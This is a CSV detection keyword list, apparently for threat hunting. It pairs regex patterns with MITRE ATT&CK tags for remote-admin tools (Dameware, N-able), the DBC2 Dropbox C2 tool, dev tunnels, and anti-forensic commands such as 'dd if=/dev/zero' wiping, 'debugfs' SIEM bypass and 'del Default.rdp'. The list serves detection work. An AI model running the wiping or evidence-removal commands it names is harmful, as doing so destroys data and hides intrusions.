"*\SolarWinds-Dameware-DRS-St.exe*",".{0,1000}\\SolarWinds\-Dameware\-DRS\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\start dameware remote everywhere agent.lnk*",".{0,1000}\\start\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\start menu\programs\dameware*",".{0,1000}\\start\smenu\\programs\\dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcdirectchat.exe*",".{0,1000}\\tcdirectchat\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcdirectchatde.dll*",".{0,1000}\\tcdirectchatde\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcdirectchaten.dll*",".{0,1000}\\tcdirectchaten\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcdirectchates.dll*",".{0,1000}\\tcdirectchates\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcdirectchatfr.dll*",".{0,1000}\\tcdirectchatfr\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcdirectchatit.dll*",".{0,1000}\\tcdirectchatit\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcdirectchatpt.dll*",".{0,1000}\\tcdirectchatpt\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcrmtshellagent.exe*",".{0,1000}\\tcrmtshellagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcrmtshellagent_*.log*",".{0,1000}\\tcrmtshellagent_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcrmtshellagentmodule_*",".{0,1000}\\tcrmtshellagentmodule_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcrmtshellviewer.exe*",".{0,1000}\\tcrmtshellviewer\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcrmtshellviewer_*.log*",".{0,1000}\\tcrmtshellviewer_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tcrmtshellviewermodule_*",".{0,1000}\\tcrmtshellviewermodule_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\tkcuploader.exe*",".{0,1000}\\tkcuploader\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\wow6432node\multiplicar negocios\bace_dameware*",".{0,1000}\\wow6432node\\multiplicar\snegocios\\bace_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<data>dameware remote everywhere</data>*",".{0,1000}\<data\>dameware\sremote\severywhere\<\/data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<data>n-able take control</data>*",".{0,1000}\<data\>n\-able\stake\scontrol\<\/data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<provider name=""dameware remote everywhere - [dameware]"" />*",".{0,1000}\<provider\sname\=\""dameware\sremote\severywhere\s\-\s\[dameware\]\""\s\/\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*admin.*.swi-dre.com*",".{0,1000}admin\..{0,1000}\.swi\-dre\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*C:\Program Files\SolarWinds\Dameware Mini Remote Control x64\*",".{0,1000}C\:\\Program\sFiles\\SolarWinds\\Dameware\sMini\sRemote\sControl\sx64\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*C:\Users\mthcht\AppData\Roaming\DameWare Development\*",".{0,1000}C\:\\Users\\mthcht\\AppData\\Roaming\\DameWare\sDevelopment\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*chat.us.n-able.com*",".{0,1000}chat\.us\.n\-able\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'company'>n-able take control</data>*",".{0,1000}\'company\'\>n\-able\stake\scontrol\<\/data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*comserver.corporate.beanywhere.com*",".{0,1000}comserver\.corporate\.beanywhere\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*DameWare Development Common Data\Mini Remote Control*",".{0,1000}DameWare\sDevelopment\sCommon\sData\\Mini\sRemote\sControl.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*DameWare Development\Agent Configuration*",".{0,1000}DameWare\sDevelopment\\Agent\sConfiguration.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*dameware remote everywhere agent - [dameware]*",".{0,1000}dameware\sremote\severywhere\sagent\s\-\s\[dameware\].{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*DameWare Remote Support.exe*",".{0,1000}DameWare\sRemote\sSupport\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*damewareagent.msi*",".{0,1000}damewareagent\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*damewareremoteeverywhereagent.exe*",".{0,1000}damewareremoteeverywhereagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*damewareremoteeverywhereconsole.exe*",".{0,1000}damewareremoteeverywhereconsole\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'Description'>Dameware products</Data>*",".{0,1000}\'Description\'\>Dameware\sproducts\<\/Data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*download.global.mspa.n-able.com/*",".{0,1000}download\.global\.mspa\.n\-able\.com\/.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*getsupportservice_common_dameware\logs*",".{0,1000}getsupportservice_common_dameware\\logs.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://downloads.solarwinds.com/solarwinds/Release/DameWare/*",".{0,1000}https\:\/\/downloads\.solarwinds\.com\/solarwinds\/Release\/DameWare\/.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*login.swi-dre.com*",".{0,1000}login\.swi\-dre\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*msi-installs.swi-rc.com/*",".{0,1000}msi\-installs\.swi\-rc\.com\/.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*notifications.*.swi-rc.com*",".{0,1000}notifications\..{0,1000}\.swi\-rc\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*product: damewareagent --*",".{0,1000}product\:\sdamewareagent\s\-\-.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*provider name=""n-able take control - [dameware]"" />*",".{0,1000}provider\sname\=\""n\-able\stake\scontrol\s\-\s\[dameware\]\""\s\/\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*--single-argument https://www.solarwinds.com/*/remote-support-software*",".{0,1000}\-\-single\-argument\shttps\:\/\/www\.solarwinds\.com\/.{0,1000}\/remote\-support\-software.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds.MRC.Licensor*",".{0,1000}SolarWinds\.MRC\.Licensor.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds.Orion.MaintDateCheck*",".{0,1000}SolarWinds\.Orion\.MaintDateCheck.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds-Dameware-DRS-St.exe*",".{0,1000}SolarWinds\-Dameware\-DRS\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds-Dameware-DRS-St-Eval.zip*",".{0,1000}SolarWinds\-Dameware\-DRS\-St\-Eval\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds-Dameware-MRC-32bit-St.exe*",".{0,1000}SolarWinds\-Dameware\-MRC\-32bit\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds-Dameware-MRC-32bit-St-Eval.zip*",".{0,1000}SolarWinds\-Dameware\-MRC\-32bit\-St\-Eval\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds-Dameware-MRC-64bit-St.exe*",".{0,1000}SolarWinds\-Dameware\-MRC\-64bit\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*SolarWinds-Dameware-MRC-64bit-St-Eval.zip*",".{0,1000}SolarWinds\-Dameware\-MRC\-64bit\-St\-Eval\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*stop dameware remote everywhere agent.lnk*",".{0,1000}stop\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*techws.*.swi-rc.com*",".{0,1000}techws\..{0,1000}\.swi\-rc\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*vaults.*.swi-rc.com*",".{0,1000}vaults\..{0,1000}\.swi\-rc\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://api.dropboxapi.com/*",".{0,1000}https\:\/\/api\.dropboxapi\.com\/.{0,1000}","greyware_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","Dropbox API calls - Understanding your environment with the applications used and allowed will enhances the effectiveness of your hunt here","10","10","282","80","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
"*dd if=/dev/nul*",".{0,1000}dd\sif\=\/dev\/nul.{0,1000}","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*dd if=/dev/zero*",".{0,1000}dd\sif\=\/dev\/zero.{0,1000}","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*debugfs /dev/*",".{0,1000}debugfs\s\/dev\/.{0,1000}","greyware_tool_keyword","debugdfs","Linux SIEM Bypass with debugdfs shell","T1059 - T1053 - T1037","TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*bihhflimonbpcfagfadcnbbdngpopnjb*",".{0,1000}bihhflimonbpcfagfadcnbbdngpopnjb.{0,1000}","greyware_tool_keyword","DEEPRISM VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*del Default.rdp*",".{0,1000}del\sDefault\.rdp.{0,1000}","greyware_tool_keyword","del","removes the Default.rdp file likely to erase evidence of RDP connections","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/xiaoy-sec/Pentest_Note/blob/52156f816f0c2497c25343c2e872130193acca80/wiki/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/Windows%E6%8F%90%E6%9D%83/RDP%26Firewall/%E5%88%A0%E9%99%A4%E7%97%95%E8%BF%B9.md?plain=1#L4","1","0","N/A","N/A","10","10","3635","918","2023-05-22T03:50:57Z","2020-06-15T02:58:36Z"
"* host -p * --allow-anonymous --protocol https*",".{0,1000}\shost\s\-p\s.{0,1000}\s\-\-allow\-anonymous\s\-\-protocol\shttps.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.asse.devtunnels.ms*",".{0,1000}\.asse\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.exe host -p * - allow-anonymous*",".{0,1000}\.exe\shost\s\-p\s.{0,1000}\s\-\sallow\-anonymous.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*.exe port create -p *",".{0,1000}\.exe\sport\screate\s\-p\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*-443.devtunnels.ms*",".{0,1000}\-443\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*asse.rel.tunnels.api.visualstudio.com*",".{0,1000}asse\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*auc1.rel.tunnels.api.visualstudio.com*",".{0,1000}auc1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*aue.rel.tunnels.api.visualstudio.com*",".{0,1000}aue\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*brs.rel.tunnels.api.visualstudio.com*",".{0,1000}brs\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*devtunnel create *",".{0,1000}devtunnel\screate\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
